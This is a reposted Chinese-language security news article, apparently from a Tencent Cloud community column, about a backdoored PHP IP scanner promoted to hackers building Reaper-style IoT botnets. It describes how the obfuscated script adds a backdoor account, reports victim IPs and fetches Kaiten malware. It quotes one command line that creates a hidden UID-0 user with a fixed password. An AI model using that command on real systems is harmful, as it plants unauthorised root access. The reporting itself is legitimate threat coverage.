Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >借Reaper僵尸网络推广免费IP扫描器 然后在IP扫描器里面放个后门

借Reaper僵尸网络推广免费IP扫描器 然后在IP扫描器里面放个后门

作者头像
昨天50还没用完
发布于 2018-06-29 07:03:40
发布于 2018-06-29 07:03:40
1.1K0
举报
文章被收录于专栏:菜鸟程序员菜鸟程序员

在过去数周内,那些希望创建自己的Reaper僵尸网络的黑客们,在下载IP扫描器的过程中都有“意外收获”。

IP扫描器是一个PHP文件。数周前,在关于Reaper新闻报道出来前,该PHP文件可免费下载。Reaper是由漏洞路由器和IoT设备组成的僵尸网络。

Reaper的不同之处在于,创建者利用IP扫描器寻找漏洞系统,然后利用漏洞利用程序去发现各种漏洞,在漏洞设备上安装Reaper恶意软件。这与近期很多僵尸网络(如Mirai和Hijime)不同,它们利用Telnet和SSH暴力字典对不安全设备发起攻击。

黑客搭车Reaper僵尸网络事件 传播自己的IP扫描器

聪明的诈骗分子很快意识到,随着这个新型僵尸网络的兴起,想要成为黑客的人和脚本小子们很快就会开始寻找各种构建类似僵尸网络的工具。

因此,该攻击者(我们不想本文中提及名字)创建了一个网站。他在该网站上推广一个PHP脚本,可从本地名为poop.txt的文本文档中读取IP地址,并检查IP是否是托管在GoAhead web服务器上,然后在GoAhead-Filtered.txt文件中列出正面结果。

黑客们对该脚本很有兴趣,因为可用于识别GoAhead服务器设备,通常是IP安全摄像头。这些设备上通常存在公共漏洞利用程序,也是Reaper僵尸网络的攻击目标。

随机字符墙后的多数PHP脚本都进行了模糊处理。对此,技术知识欠缺和未留意到PHP脚本源代码的脚本小子们并不感到奇怪。青天科技(NewSky Security)发现了这一点,其首席研究人员Ankit Anubhav表示:

“这种情况下,脚本通过ROT13和base64进行多次加密,并且数据也是压缩的。”

谁曾想 IP扫描器脚本有后门 黑客秒变肉鸡

进行代码反编译后,Anubhav表示,该脚本包含很明显的后门,有经验的程序员都可以预见到大量模糊化的源代码。

这些代码包含四部分。第一部分是功能完备的IP扫描器 。第二部分运营Bash命令,在Linux服务器上添加新用户,受害者可在该服务器上执行IP扫描器脚本。第三部分是在远程服务器上登录受害者IP地址。第四部分是在执行IP扫描器的服务器上下载和执行Kaiten僵尸网络恶意软件。

一般而言,那些寻求创建自己的类似Reaper僵尸网络的“黑客小子”们,最后都沦为他人Kaiten僵尸网络的组成部分。

并且,通过使用已登录的IP地址和后门账户(用户名VM,密码Meme123),提供该脚本的攻击者还能够登录受感染的服务器.

useradd -o -u 0 -g 0 -M -d /root -s /bin/bash VM; echo -e "Meme123\nMeme123" | passwd VM;

在接受媒体采访中,Anubhav还指出,攻击者可利用该后门收集包含其他人扫描结果的GoAhead-Filtered.txt文件,并在其他僵尸网络攻击者为了做好其他一切准备后,利用这些IP地址劫持GoAhead摄像头。

其它黑客发现后门 在Twitter喊话那个“作死者”

整个过程并不复杂,Anubhav并不是唯一发现后门的人 。其他黑客也发现了后门,并在Twitter上喊话创建者。

通过深入挖掘后门创建者所用的一些ID,我们还发现:这不是他第一次发布后门恶意软件,也不是第一次与其他黑客在线争吵 。这也许就是Anubhav能够发现黑客名义的dox文件的原因。

本文写作之时,兜售PHP脚本的网站已被叫停,但Anubhav告诉媒体称:

电脑黑客还会继续在地下黑客论坛上出售其他脚本,并会为想要建立IoT僵尸网络的人提供支持。

这也不是黑客地下市场提供的第一个后门恶意软件 。今年9月份,Zscaler发现了一个隐藏在Cobian RAT恶意软件中的后门。当时,该后门在各种地下黑客论坛上出售。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
日益扩大的IoT僵尸网络威胁或将摧毁互联网
一年前,最大的基于物联网的病毒Mirai通过发动大规模DDoS攻击造成网络中断。现在又有另一款基于IoT的僵尸网络浮出水面。 这个病毒今年9月由奇虎360公司研究人员首次发现,命名为“IoT_reap
FB客服
2018/02/26
8510
日益扩大的IoT僵尸网络威胁或将摧毁互联网
僵尸网络新动向
最近发现一些恶意软件活动影响了许多运行Linux的设备,该平台今年刚刚解决了许多问题。对检索到的恶意软件样本的进一步分析显示,这些操作与一个名为Momentum的僵尸网络(根据在其通信通道中找到的图像命名)有关。此外发现了僵尸网络目前用于攻击其他设备和执行DDoS攻击的工具以及技术细节。
FB客服
2020/02/20
6310
僵尸网络新动向
由家用路由器构成的可“自我复制”僵尸网络
大量家庭和小型办公室的路由器正处于黑客的控制之下,黑客们不仅利用这些路由器组成僵尸网络进行DDoS攻击,还通过运行特殊的shell脚本使它们“自我复制”。 大量路由器被黑客控制 在过去的四个月中安全公司Incapsula记录了来自于全世界1600多家ISP提供商的40,269多个IP地址的攻击信息。通过观察所有被攻击的路由器,我们发现它们都可以进行远程管理,而且几乎所有的账号使用运营商所提供的默认登录账号密码(包括SSH和HTTP)。 攻击者通过这些默认密码登录路由并植入各种恶意软件,包括MrBlac
FB客服
2018/02/06
9960
由家用路由器构成的可“自我复制”僵尸网络
揭秘来自中国的数字货币“挖矿”军团 – Bondnet僵尸网络
Bondnet的控制者通过一系列公开漏洞,利用Windows管理服务(WMI)木马对服务器进行入侵控制。根据GuardiCore的分析显示,昵称为Bond007.01的Bondnet控制者,能获得对肉鸡服务器的完全控制权,具备数据窃取、勒索和发起其它进一步攻击的可能。Bondnet自2016年12月出现以来,主要进行门罗币(Monero)的挖掘,其一天的收入可达1千美元之多。
FB客服
2018/02/24
1.7K0
揭秘来自中国的数字货币“挖矿”军团 – Bondnet僵尸网络
了解你的敌人:跟踪僵尸网络
大家好,又见面了,我是你们的朋友全栈君。 了解你的敌人:跟踪僵尸网络 利用蜜网对僵尸主机了解更多 蜜网项目组 & 蜜网研究联盟 http://www .honeynet.org 最后修改日期 : 2005 年 3 月 13 日
全栈程序员站长
2022/09/15
1.4K0
Mirai僵尸网络 “元凶”落网
E安全12月15日讯 美国司法部(DOJ)当地时间12月13日公开的法庭文件显示,三名黑客承认创建Mirai恶意软件,并利用Mirai僵尸网络对多个目标发起DDoS攻击。 三人分工明确创建Mirai 三名黑客分别为:帕拉斯-杰哈、约西亚-怀特和道尔顿-诺曼。 认罪协议(Plea Agreement)显示,怀特创建了Mirai Telnet扫描器;杰哈创建了Mirai僵尸网络的核心基础设施,并开发了这款恶意软件的远程控制功能;诺曼开发了新漏洞利用。 美国当局表示,针对运行Linux操作系统的设备,三名黑客
企鹅号小编
2018/03/02
7370
Mirai僵尸网络 “元凶”落网
带你了解僵尸网络是怎样组成的?
在流量攻击中,攻击者通常利用大批量僵尸网络和大量肉鸡发送恶意访问请求,因此有些人就会想说僵尸网络是什么?对于不懂网络得人肯定是存有疑问的,所以也经常会在网络安全防护中遇到用户问到僵尸网络是什么?它来自哪里呢?那么,此篇文章带你了解僵尸网络是什么,怎么样组成的.
墨者盾
2019/06/25
1.3K0
带你了解僵尸网络是怎样组成的?
Mirai和Gafgyt僵尸网络新变种近期十分活跃
安全专家警告称,广大用户近期应该小心Mirai和Gafgyt僵尸网络了,因为这两个臭名昭著的物联网僵尸网络又开始活跃了起来。
FB客服
2018/07/31
7770
Mirai和Gafgyt僵尸网络新变种近期十分活跃
Linux XOR DDoS僵尸网络发起强有力的DDoS攻击
Akamai的专家们发现Linux XOR DDoS僵尸网络,它是一个恶意的网络基础设施,可用于对几十个目标发起强有力的DDoS攻击。此外,它主要针对游戏领域和教育行业的网站。 XOR DDoS介绍 安全人员已经发现了一种Linux僵尸网络,它被称为XOR DDoS或Xor.DDoS僵尸网络。此外,它主要针对游戏和教育网站,能够对其发起强有力的DDoS攻击,可以达到每秒1500亿字节的恶意流量。根据内容分发网络Akamai科技发布的一份报告,XOR DDoS僵尸网络每天至少瞄准20个网站,将近90%的目
FB客服
2018/02/06
2.6K0
Linux XOR DDoS僵尸网络发起强有力的DDoS攻击
悉数僵尸网络:知己知彼 百战不殆
  研究中发现,网络中存在着各式各样的僵尸计算机类型。以下我们将讨论几种比较流行和危害面较大的僵尸类型。我们将介绍几种恶意软件的基本概念,然后再详尽的描述它们的特征。此外,我们还将描述僵尸的源代码以及它们的命令设置清单。
全栈程序员站长
2022/09/15
7620
2018年上半年物联网恶意活动&僵尸网络数据摘要
在F5实验室最新发布的物联网安全报告中,分析了2018年1月至6月期间全球物联网(IoT)设备受攻击的数据,涵盖物联网设备使用的主流服务和20个端口的分析数据。
FB客服
2018/12/07
1.9K0
2018年上半年物联网恶意活动&僵尸网络数据摘要
僵尸病毒的危害,企业该如何避免僵尸网络
僵尸网络 Botnet 是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序)病毒,从而在控制者和被感染主机之间所形成的一个可一对多控制的网络
用户8021864
2024/05/10
2810
全球超过200,000台MicroTik路由器受到僵尸网络恶意软件的控制
近期,专家表示受僵尸网络控制的MicroTik路由器是他们近年来看到的最大的网络犯罪活动之一。根据Avast发布的一项新研究,Glupteba僵尸网络以及臭名昭著的TrickBot恶意软件的加密货币挖掘活动都使用相同的命令和控制(C2)服务器进行分发。Avast的高级恶意软件研究员Martin Hron说,“近230,000个易受攻击的MikroTik路由器受到僵尸网络的控制。”
FB客服
2022/04/12
7280
全球超过200,000台MicroTik路由器受到僵尸网络恶意软件的控制
互联网世界的毒瘤——僵尸网络
从世界上第一个蠕虫病毒————莫里斯————因其巨大的系统破坏力和传播速度被人们所关注,便意味着在恶意代码斗争的战场上传播速度势必成为新的衍变方式。而互联网自上世纪90年代初期开始迅猛发展更是为这种恶意代码的快速传播提供了新的媒介和渠道,没有人料到另外一种结合病毒、木马、蠕虫技术为一体的新的信息安全威胁方式————僵尸网络————会如此令世界诸多信息安全专家所头疼,以至于直到今天,在针对僵尸网络的行动中,处于正义一方的白帽子们仍然无法信心满满地占得上风。 创造和管理僵尸网络的软件使得僵尸网络的危害程度远远高
FB客服
2018/02/02
2.4K0
互联网世界的毒瘤——僵尸网络
新XBash恶意软件融合勒索病毒、挖矿、僵尸网络和蠕虫功能
近期,Palo Alto Network的研究人员发现了一款名叫XBash的新型恶意软件,而这款恶意软件不仅是一个勒索软件,而且它还融合了挖矿、僵尸网络和蠕虫等功能。
FB客服
2018/10/25
6140
新XBash恶意软件融合勒索病毒、挖矿、僵尸网络和蠕虫功能
由大型物联网僵尸网络驱动的DDoS攻击
基于物联网设备的僵尸网络 随着信息安全技术的不断发展,物联网僵尸网络现在也成为了信息安全领域内最为危险的安全威胁之一。近期,我们检测到了两起由这些物联网基础设施所驱动的网络攻击,而这两次攻击的规模是我们此前从未见到过的。 安全研究人员在报告中指出,近期由物联网僵尸网络驱动的DDoS攻击(分布式拒绝服务攻击)用大量恶意HTTP流量对目标网站进行了攻击。 在某个特定的时段内,流量峰值曾一度超过了每秒一百万个请求数。据了解,这些基于物联网设备的僵尸网络其背后的始作俑者就是Mirai恶意软件,攻击者可以利用这款
FB客服
2018/02/09
8660
由大型物联网僵尸网络驱动的DDoS攻击
由近20万“肉鸡”组成的僵尸网络PyCryptoMiner正疯狂开采门罗币
“用指尖改变世界” F5 Networks的安全研究人员已经发现了一个新的Linux加密僵尸网络并将其命名为“PyCryptoMiner”,它正在扩展到SSH协议上。 根据研究人员的描述,PyCryptoMiner主要包括以下五个特性: 基于Python脚本语言,意味着很难被检测到; 在原始命令和控制(C&C)服务器不可用时,利用Pastebin[.]com(在用户名“WHATHAPPEN”下)接收新的C&C服务器分配; 注册人与超过3.6万个域名相关联,其中一些域名自2012年以来一直以诈骗、赌博和成
企鹅号小编
2018/02/08
1.2K0
由近20万“肉鸡”组成的僵尸网络PyCryptoMiner正疯狂开采门罗币
BotenaGo 僵尸网络源码泄露,攻击者武器库又增加
2021 年 11 月,AT&T Alien Labs 首次披露 Golang 编写的恶意软件 BotenaGo。最近,该恶意软件的源代码被上传到 GitHub 上,这可能会催生更多的恶意软件变种,预计也会有攻击者利用这些开源代码改进、混淆自己的恶意软件。
FB客服
2022/02/25
6220
BotenaGo 僵尸网络源码泄露,攻击者武器库又增加
DarkCrewFriends黑客组织攻击分析
Check Point研究人员最近发现黑客组织“DarkCrewFriends”发起的攻击活动,其主要目的是利用存在漏洞的PHP服务器组建僵尸网络。攻击主要利用文件上传漏洞,上传恶意PHP web shell并使用IRC通道与C&C服务器通信。攻击者可以利用植入的恶意软件发起DDoS攻击或远程执行命令。
FB客服
2020/08/11
6340
DarkCrewFriends黑客组织攻击分析
GoBrut破解型僵尸网络悄然再度来袭
Go语言因为跨平台且易上手,越来越受到攻击者的青睐。2019年年初[1],一个由Go语言编写的新型恶意软件家族问世,称为GoBrut(又名StealthWorker),目的是检测目标站点的服务并对其进行爆破。GoBrut行为低调但野心勃勃,每次均攻击众多Web服务器。7个月之内,GoBrut的版本号不断更新,从初版跃升至目前的3.0X,已至少出现过10个版本号,迭代稳定,感染的平台也从Windows扩展到Linux。这一切与当前脆弱的Web安全现状不无关系。
绿盟科技研究通讯
2019/12/11
1.6K0
GoBrut破解型僵尸网络悄然再度来袭
推荐阅读
相关推荐
日益扩大的IoT僵尸网络威胁或将摧毁互联网
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档